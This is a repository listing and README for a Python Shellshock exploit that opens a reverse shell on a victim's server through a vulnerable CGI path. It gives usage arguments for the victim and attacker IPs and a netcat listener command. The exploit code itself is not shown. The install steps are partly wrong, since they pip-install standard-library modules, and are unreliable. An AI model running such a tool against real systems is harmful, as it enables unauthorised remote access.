https://github.com/8dcc/shellshock-python-exploit
Python script for the shellshock vulnerability.
https://github.com/8dcc/shellshock-python-exploit
Last synced: 3 months ago
JSON representation
Python script for the shellshock vulnerability.
- Host: GitHub
- URL: https://github.com/8dcc/shellshock-python-exploit
- Owner: 8dcc
- Created: 2020-06-23T17:14:27.000Z (about 6 years ago)
- Default Branch: master
- Last Pushed: 2020-07-05T22:00:07.000Z (almost 6 years ago)
- Last Synced: 2025-02-23T12:14:31.976Z (over 1 year ago)
- Language: Python
- Size: 12.7 KB
- Stars: 3
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
## Shellshock python exploit
Python script for the shellshock vulnerability.
### Installation
```sudo apt install python-pip && pip install sys && pip install requests && pip install time```
```git clone https://github.com/r4v10l1/shellshock_python_exploit```
```cd shellshock_python_exploit```
```chmod +x shellshock.py```
```./shellshock.py```
### Usage
python shellshock.py `Victim IP` `Vulnerable .cgi path` `Your IP` `Reverse Shell Port`
It is important to leave a space between the victim's ip and the .cgi path.
Example: shellshock.py 192.168.1.X /here/your.cgi 127.0.0.1 4444
Listener command: nc -lvp `port`
### Screenshot
